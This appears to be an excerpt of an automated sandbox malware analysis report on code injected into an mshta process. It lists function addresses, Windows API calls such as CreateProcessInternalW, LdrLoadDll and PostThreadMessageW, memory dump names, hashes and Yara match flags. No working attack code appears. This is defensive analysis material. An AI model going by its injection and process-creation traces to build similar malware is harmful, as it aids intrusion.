                                                                                                                                    • Opcode Fuzzy Hash: 452916c20ae9be8ca1936934a4354b9e15becaa69a9e9591b14915982853d2f0
                                                                                                                                    • Instruction Fuzzy Hash: AB90023120650813F511B15C4508707004D87D1241F95C417A0428558D97578A52A125
                                                                                                                                    Function 03982D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: a7010abd95f9b3c489fde41e8462331f9d28267c25f9fdb62c0c65756c7a8d2b
                                                                                                                                    • Instruction ID: 88b8c7df0b3763ec5cc33d27d0414ac118f94a5c54466c1ee3546a553ec25246
                                                                                                                                    • Opcode Fuzzy Hash: a7010abd95f9b3c489fde41e8462331f9d28267c25f9fdb62c0c65756c7a8d2b
                                                                                                                                    • Instruction Fuzzy Hash: FB90022921750402F580B15C540C60A004987D2202F95D41AA0019558CCA1689695325
                                                                                                                                    Function 03982D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 2fa61ad8edc115a21573537c7ebf8918346da5edb96ae4c3bf1ff566d181cec5
                                                                                                                                    • Instruction ID: 1af2e4e6d3abf2172e97aa8261ce7e2956c15c54d417a571b94dcf72b00c6b72
                                                                                                                                    • Opcode Fuzzy Hash: 2fa61ad8edc115a21573537c7ebf8918346da5edb96ae4c3bf1ff566d181cec5
                                                                                                                                    • Instruction Fuzzy Hash: F390022130650403F540B15C541C6064049D7E2301F55D016E0418554CDA1689565226
                                                                                                                                    Function 03982CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 68cb69f28210c73b40753755ed375ca208d48151d18637ccffafb2d075a7e4c4
                                                                                                                                    • Instruction ID: 7842fd8fdaf01630ef1612b1ea5de0d909ae31651898f629c7da392baecd2b44
                                                                                                                                    • Opcode Fuzzy Hash: 68cb69f28210c73b40753755ed375ca208d48151d18637ccffafb2d075a7e4c4
                                                                                                                                    • Instruction Fuzzy Hash: 4090023120650802F500B59C540C646004987E1301F55D016A5028555EC76689916135
                                                                                                                                    Function 03982C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 53179d3e76bce495bb0befd7e4fb3e625c26b7dea838cad0e7ea8f8263ff7437
                                                                                                                                    • Instruction ID: 203f9c8f9bc7635fdfbb0c611244370dbcee7463a5516b41a9493590d876ec50
                                                                                                                                    • Opcode Fuzzy Hash: 53179d3e76bce495bb0befd7e4fb3e625c26b7dea838cad0e7ea8f8263ff7437
                                                                                                                                    • Instruction Fuzzy Hash: 2D90023120658C02F510B15C840874A004987D1301F59C416A4428658D879689917125
                                                                                                                                    Function 03982C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: c9dc3f4bf707fabc54f0bdd97c2ffd6516bae11127e1204ad14faa8fa5fbf69e
                                                                                                                                    • Instruction ID: c579929095cab740b364adff23d14ad346d2b2707f8effd90d78f8327d79aebb
                                                                                                                                    • Opcode Fuzzy Hash: c9dc3f4bf707fabc54f0bdd97c2ffd6516bae11127e1204ad14faa8fa5fbf69e
                                                                                                                                    • Instruction Fuzzy Hash: 0390023120650C42F500B15C4408B46004987E1301F55C01BA0128654D8716C9517525
                                                                                                                                    Function 039835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 6074b6f643aedaea16aa9ac90fa3de6005a07db30e0c3b8275cc373442f0c0a5
                                                                                                                                    • Instruction ID: f4e6c41e1352c4a6984e5eb68dfc8b15e44cf54185fbd4ce6d17a47e60bca2ee
                                                                                                                                    • Opcode Fuzzy Hash: 6074b6f643aedaea16aa9ac90fa3de6005a07db30e0c3b8275cc373442f0c0a5
                                                                                                                                    • Instruction Fuzzy Hash: 5690023160A60802F500B15C4518706104987D1201F65C416A0428568D87968A5165A6
                                                                                                                                    Function 039839B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: db9fa0974e7a29b715dca886e9b5ad94f29fe3fe07441e729cce83c280a73c81
                                                                                                                                    • Instruction ID: a36297a0107c8506a3a8a25226c01441dd6d40dbad37b4312bd55f5a1565c20d
                                                                                                                                    • Opcode Fuzzy Hash: db9fa0974e7a29b715dca886e9b5ad94f29fe3fe07441e729cce83c280a73c81
                                                                                                                                    • Instruction Fuzzy Hash: B390022124A55502F550B15C44086164049A7E1201F55C026A0818594D865689556225
                                                                                                                                    Function 00B90E3E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 516 b90e3e-b90eae call bab6a0 call bac0b0 call b945e0 call b81410 call ba1d30 528 b90ed0-b90ed5 516->528 529 b90eb0-b90ec1 PostThreadMessageW 516->529 529->528 530 b90ec3-b90ecd 529->530 530->528
                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(1863I7301,00000111,00000000,00000000), ref: 00B90EBD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID: 1863I7301$1863I7301
                                                                                                                                    • API String ID: 1836367815-3745599348
                                                                                                                                    • Opcode ID: db745ec219eb3f97f798e0b6bec47fa0c10ae7db127345883e8482ea04918055
                                                                                                                                    • Instruction ID: 58b724f4147d201eabf3889f7152b8eed42b8690323e9b4c131ea8fd9799ca71
                                                                                                                                    • Opcode Fuzzy Hash: db745ec219eb3f97f798e0b6bec47fa0c10ae7db127345883e8482ea04918055
                                                                                                                                    • Instruction Fuzzy Hash: 2001DB71D4121876DB11A6D48C02FDF7BBC9F41B50F048495FA047B281D7B466068BE6
                                                                                                                                    Function 00B90E40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 531 b90e40-b90eae call bab6a0 call bac0b0 call b945e0 call b81410 call ba1d30 542 b90ed0-b90ed5 531->542 543 b90eb0-b90ec1 PostThreadMessageW 531->543 543->542 544 b90ec3-b90ecd 543->544 544->542
                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(1863I7301,00000111,00000000,00000000), ref: 00B90EBD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID: 1863I7301$1863I7301
                                                                                                                                    • API String ID: 1836367815-3745599348
                                                                                                                                    • Opcode ID: 001725b3b93487e4ade9a6ec4ea4c7a4866323755139e95977e0f61fb8a6713a
                                                                                                                                    • Instruction ID: ecfcc8a470879250639cb40e5a22e3163a7d5f9457ecb5a13b0ce8c9dff80799
                                                                                                                                    • Opcode Fuzzy Hash: 001725b3b93487e4ade9a6ec4ea4c7a4866323755139e95977e0f61fb8a6713a
                                                                                                                                    • Instruction Fuzzy Hash: 5C01D671D402187AEB21AAD08C02FDF7BBC9F41B50F0484A5FA047B281D6B46A068BE6
                                                                                                                                    Function 00BA3BE0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00BA3CBB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                    • Opcode ID: 29ee593cef3d7a584b31e8ac39f32b9d6c4dafae704aba1e113f57161abfc785
                                                                                                                                    • Instruction ID: 49d927ec4719244a90fa71504c38a3ae86d6eeb6ec6d597dab337ba41dc46e9c
                                                                                                                                    • Opcode Fuzzy Hash: 29ee593cef3d7a584b31e8ac39f32b9d6c4dafae704aba1e113f57161abfc785
                                                                                                                                    • Instruction Fuzzy Hash: 7931A2B0905205BBD714DFA4CC81FEBB7F8FB88710F548568F619AB241D770AA40CBA0
                                                                                                                                    Function 00B9F609 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeUninitialize
                                                                                                                                    • String ID: @J7<
                                                                                                                                    • API String ID: 3442037557-2016760708
                                                                                                                                    • Opcode ID: 2390f7767de606ac11467978aa2418ffb677be07cfb9226cc0ebd00587b4e72f
                                                                                                                                    • Instruction ID: 3e8537dc844ff811cf5afa693ddfdf5b3b3d6b849d1347e945c211e46fd4964d
                                                                                                                                    • Opcode Fuzzy Hash: 2390f7767de606ac11467978aa2418ffb677be07cfb9226cc0ebd00587b4e72f
                                                                                                                                    • Instruction Fuzzy Hash: 21313075A0020AAFDB00DFD8D880DAEB7B9FF48314B108569E515E7214D775EE05CBA0
                                                                                                                                    Function 00B9F610 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeUninitialize
                                                                                                                                    • String ID: @J7<
                                                                                                                                    • API String ID: 3442037557-2016760708
                                                                                                                                    • Opcode ID: a0d09436d9c9c3f4a2335c2062a5b4f526f0148d70c16525b6aff262c8b5fe8b
                                                                                                                                    • Instruction ID: 4c012d06ca4db0eac3b460505dc9c0408a4bfc759244bd0221ea2b323b157c60
                                                                                                                                    • Opcode Fuzzy Hash: a0d09436d9c9c3f4a2335c2062a5b4f526f0148d70c16525b6aff262c8b5fe8b
                                                                                                                                    • Instruction Fuzzy Hash: 41311075A0020AAFDF00DFD8D880DEEB7B9FF88314B1085A9E515E7214D775AE45CBA0
                                                                                                                                    Function 00B98439 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 00B9846C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: fc1a7d541a62c4c3031e15edd86a0b2be61ec66e19683f84aac837c41dda87f7
                                                                                                                                    • Instruction ID: deeae16cb692047b39c121487905446a488e5feffa3cfb345e052900d7cd1e23
                                                                                                                                    • Opcode Fuzzy Hash: fc1a7d541a62c4c3031e15edd86a0b2be61ec66e19683f84aac837c41dda87f7
                                                                                                                                    • Instruction Fuzzy Hash: 9C0147311451111AEF24A668EC46BE83394EF23770F2842F5E9A58B7E2DF20D40283C0
                                                                                                                                    Function 00B945E0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00B94652
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                    • Opcode ID: 352a911c7d75b054859a4398694d1711e84ed81b6f2a009f0faaad9a1ff4d0c8
                                                                                                                                    • Instruction ID: e28cb5ca8590e579dcce4ead94bbf1d7ac114143165953182bbe92baedcb83ad
                                                                                                                                    • Opcode Fuzzy Hash: 352a911c7d75b054859a4398694d1711e84ed81b6f2a009f0faaad9a1ff4d0c8
                                                                                                                                    • Instruction Fuzzy Hash: 26011EB5D0020DBBDF10DBA4DC42F9EB7B89B55308F0041E5E91997241F671EB15CB91
                                                                                                                                    Function 00BA9920 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessInternalW.KERNELBASE(?,?,?,?,00B983FE,00000010,?,?,?,00000044,?,00000010,00B983FE,?,?,?), ref: 00BA9983
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                    • Opcode ID: 6ea01a7ff4a3b988e7bd5e8932b0d4cf99e1f30f05d6bd031bf9368e7b03419e
                                                                                                                                    • Instruction ID: 227c6a6e808f0dd4070bbd15a2e21a1832c61f2b8bfb5bba322f8961b6bbd62e
                                                                                                                                    • Opcode Fuzzy Hash: 6ea01a7ff4a3b988e7bd5e8932b0d4cf99e1f30f05d6bd031bf9368e7b03419e
                                                                                                                                    • Instruction Fuzzy Hash: C301C0B2205108BBCB44DE89DC81EEB77EDAF8C754F408108BA09E3241D630FC518BA4
                                                                                                                                    Function 00B89B50 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00B89B95
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                    • Opcode ID: 71146925fc6a45ec1a197cebbe2be8cc4740c8cdd4cc473c49f117801a2d2c00
                                                                                                                                    • Instruction ID: b716e77499f7dcc98967896267de5c9f938035fb4e451236797dfafa1a430dd9
                                                                                                                                    • Opcode Fuzzy Hash: 71146925fc6a45ec1a197cebbe2be8cc4740c8cdd4cc473c49f117801a2d2c00
                                                                                                                                    • Instruction Fuzzy Hash: 9DF039732812143AE22065A9AC03FDBB68CDB81B71F1404A5F60CEA281D996B84282E8
                                                                                                                                    Function 00B89B4A Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00B89B95
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                    • Opcode ID: 2c458e2b8ce2927f38de67eb57f946e4c994198e07871ada8cdd3a7a1e67f4b5
                                                                                                                                    • Instruction ID: 0d4865fb136ade9a0b3c25de9b465a945f5396bb38c0520738a4c666f10aa518
                                                                                                                                    • Opcode Fuzzy Hash: 2c458e2b8ce2927f38de67eb57f946e4c994198e07871ada8cdd3a7a1e67f4b5
                                                                                                                                    • Instruction Fuzzy Hash: 60F092722853043AE23075A9DC03FD776CCCB85B60F240465F708EB2C1EA95B84283F8
                                                                                                                                    Function 00BA9890 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C4830C75,00000007,00000000,00000004,00000000,00B93E6C,000000F4), ref: 00BA98CF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                    • Opcode ID: 38eafd8a1ea63597223e5a1425a7c26f04ed257e1e495f63d6fb01429785e211
                                                                                                                                    • Instruction ID: b427fff5169f3321d47be4791202b9f24a7c259074d7093ca581415d97eeffb0
                                                                                                                                    • Opcode Fuzzy Hash: 38eafd8a1ea63597223e5a1425a7c26f04ed257e1e495f63d6fb01429785e211
                                                                                                                                    • Instruction Fuzzy Hash: CDE065762002057BD610EE59DC41EAB73ACEF89750F104418FA08E7282DA30BD118BB8
                                                                                                                                    Function 00BA9840 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RtlAllocateHeap.NTDLL(00B91AD9,?,00BA5AD7,00B91AD9,00BA57DF,00BA5AD7,?,00B91AD9,00BA57DF,00001000,?,?,00000000), ref: 00BA987F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                    • Opcode ID: b6deca932c6654ca86d4eb412088f9019d810c86403fd3c820abf9ad62f2039c
                                                                                                                                    • Instruction ID: b872270d9cffb45afa970a4d184d5a55dd0cdd4516abe20226c5b0cd92297df2
                                                                                                                                    • Opcode Fuzzy Hash: b6deca932c6654ca86d4eb412088f9019d810c86403fd3c820abf9ad62f2039c
                                                                                                                                    • Instruction Fuzzy Hash: 3FE065762042047BDA10EE59DC42FEB33ACEF89714F004448FA08A7242D730BC118BB9
                                                                                                                                    Function 00B98440 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 00B9846C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: 153cb165ba099021724881be2f76dccd1af5f3b7ec718c6c9b8ad7e879761052
                                                                                                                                    • Instruction ID: f79192957ffe7c289dab8393a6b7517b8dc7807812bb330216c5a5b978b41775
                                                                                                                                    • Opcode Fuzzy Hash: 153cb165ba099021724881be2f76dccd1af5f3b7ec718c6c9b8ad7e879761052
                                                                                                                                    • Instruction Fuzzy Hash: 9BE04F7525020427EA246AECDC46B6633989B49B64F184AB0B99C9B7E2EA78E9414190
                                                                                                                                    Function 00B98230 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00B91DE0,00BA811F,00BA57DF,00B91DA3), ref: 00B98263
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                    • Opcode ID: 6cc887929a64fc0ce903761313f6efd3b3b81145959393386b19d0d1d6f233c9
                                                                                                                                    • Instruction ID: f8400445de2ab96a3a453e992f25633bff0943dab92594398f8a188e6820bdb4
                                                                                                                                    • Opcode Fuzzy Hash: 6cc887929a64fc0ce903761313f6efd3b3b81145959393386b19d0d1d6f233c9
                                                                                                                                    • Instruction Fuzzy Hash: 98D05E716842043BEA40B6E9DC07F5632CC9B05754F0448B4BA08D72C3ED55E40146A5
                                                                                                                                    Function 00B9822F Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
